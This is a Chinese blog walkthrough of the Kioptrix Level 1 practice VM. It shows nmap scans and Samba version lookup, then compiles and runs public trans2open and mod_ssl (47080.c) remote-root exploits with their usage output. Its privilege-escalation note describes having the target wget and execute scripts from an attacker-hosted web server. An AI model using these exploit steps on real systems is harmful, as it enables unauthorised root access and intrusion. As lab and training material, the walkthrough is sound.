Kioptrix Level 1

Kioptrix Level 1

MADISUN Lv2
  2024-01-29 21:20:25 2024-01-29 21:20:25 Created   2024-03-09 20:07:10 2024-03-09 20:07:10 Updated      1.2k Words  5 Mins  

Kioptrix Level 1

参考 Walkthrough-KIOPTRIX LEVEL1 - Jarwu - 博客园 (cnblogs.com)

渗透思路

信息收集

  • nmap扫描附近存活主机ip
1
sudo nmap -sn xxxx

拿到目标ip为192.168.89.132

  • nmap扫描端口
1
sudo nmap -sV -p- -T4 xxxx

-sV 列举出端口使用协议或服务的版本信息

-p- 扫描全端口

-T4 设置线程数 加快扫描速度

开放端口信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-29 08:00 EST
Nmap scan report for localhost (192.168.89.132)
Host is up (0.0021s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: XMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:A6:90:BB (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.09 seconds

思路1——Samba 139端口

查询Samba版本

  • 三种工具:enum4linuxsmbclientmetasploit

    • smbclient -L=

  • 这里使用metasploit的Auxiliary模块

截屏2024-01-29_下午9.19.41

  • 设置RHOSTS 得到smb版本:2.2.1a

截屏2024-01-29_下午9.21.32

==注意:oscp中不允许使用msf,这里仅供学习==

寻找exploit

  • 工具:searchsploit
  • 用searchsploit 查找:searchsploit Samba 2.2.1a

截屏2024-01-29_下午9.29.16

发现存在trans2open Overflow的漏洞

编译和运行脚本

github脚本

  • 编译:gcc trans2open.c -o trans2open

  • 运行:./trans2open

    1
    2
    3
    4
    5
    6
    7
    8
    Samba < 2.2.8 Remote Root exploit by Schizoprenic
    Connect back method, Xnuxer-Labs, 2003.
    Usage  : ./trans2open <type> <victim> <your_ip>
    Targets:
             0 = Linux
             1 = FreeBSD/NetBSD
             2 = OpenBSD 3.0 and prior
             3 = OpenBSD 3.2 - non-exec stack

  • 根据提示:./trans2open 0 192.168.89.132 192.168.89.137

截屏2024-01-29_下午9.34.28

searchsploit自带脚本

  • 编译

  • 运行

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)                                                                  
    --------------------------------------------------------------                                                                  
    Usage: ./10 [-bBcCdfprsStv] [host]                                                                                              
                                                                                                                                    
    -b    bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)                          
    -B        bruteforce steps (default = 300)                                                                                
    -c  connectback ip address                                                                                          
    -C  max childs for scan/bruteforce mode (default = 40)                                                              
    -d       bruteforce/scanmode delay in micro seconds (default = 100000)                                                   
    -f              force                                                                                                           
    -p        port to attack (default = 139)                                                                                  
    -r         return address                                                                                                  
    -s              scan mode (random)                                                                                              
    -S     scan mode                                                                                                       
    -t        presets (0 for a list)                                                                                          
    -v              verbose mode

  • 根据提示:./10 -b 0 192.168.89.132

截屏2024-01-29_下午10.29.37

思路2 ——mod_ssl/2.8.4 端口443

版本信息

这里nmap把版本写的很清楚:443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b

寻找exploit

  • searchsploit mod_ssl 2.8.4

截屏2024-01-29_下午11.33.13

挑选一个数值更大的文件:47080.c

  • searchsploit -x unix/remote/47080.c

截屏2024-01-29_下午11.35.09

仔细看注释,里面写了requirements和编译命令

编译和运行脚本

这个步骤其实就是根据提示补全命令,运行脚本后,可以直接拿到root(理论上)。

事实上,我尝试了很久,大概在七八次的时候才拿到root(碰运气)

截屏2024-01-29_下午11.29.06

在此之前都是拿到一个普通用户apache的权限,因此,我学习了一些提权知识,详见学习总结——关于Linux提权

学习总结

关于Samba

Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个免费软件,由服务器及客户端程序构成。Samba 是能够在任何支持 SMB 协议的主机之间共享文件的一种实现,当然也包括 windows。SMB 是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB 协议是 C/S 型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。

关于MSF的Auxiliary

auxiliary 本身意思为辅助的

在msf中代表辅助探测模块:该模块不会直接在攻击机和靶机之间建立访问,它们只负责执行扫描,嗅探,指纹识别等相关功能以辅助渗透测试。

本次渗透测试用于查询smb服务版本

关于Linux 提权(部分)

此处是因为一点小bug,脚本在运行的时候wget不稳定,导致提权脚本没拉到本地,因此没有成功,只有一个普通用户的权限。

在遇到这个问题的时候,我顺便学习了一点提权知识:

  • 利用linux内核版本信息(uname -a在靶机上查看),然后在攻击机上搜索exploit
  • 通过爆破脚本,暴力破解root密码

但提权过程基本是:寻找exploit或相关脚本,通过在攻击机上开启apache服务,将脚本上传到/var/www/html之中,然后靶机通过wget http://攻击机ip/目标脚本 拿到本地执行

  • Title: Kioptrix Level 1
  • Author: MADISUN
  • Created at : 2024-01-29 21:20:25
  • Updated at : 2024-03-09 20:07:10
  • Link: https://redefine.ohevan.com/2024/01/29/Kioptrix_Level_1/
  • License: This work is licensed under CC BY-NC-SA 4.0.
On this page
Kioptrix Level 1
  1. Kioptrix Level 1
    1. 渗透思路
      1. 信息收集
      2. 思路1——Samba 139端口
        1. 查询Samba版本
        2. 寻找exploit
        3. 编译和运行脚本
          1. github脚本
          2. searchsploit自带脚本
      3. 思路2 ——mod_ssl/2.8.4 端口443
        1. 版本信息
        2. 寻找exploit
        3. 编译和运行脚本
    2. 学习总结
      1. 关于Samba
      2. 关于MSF的Auxiliary
      3. 关于Linux 提权(部分)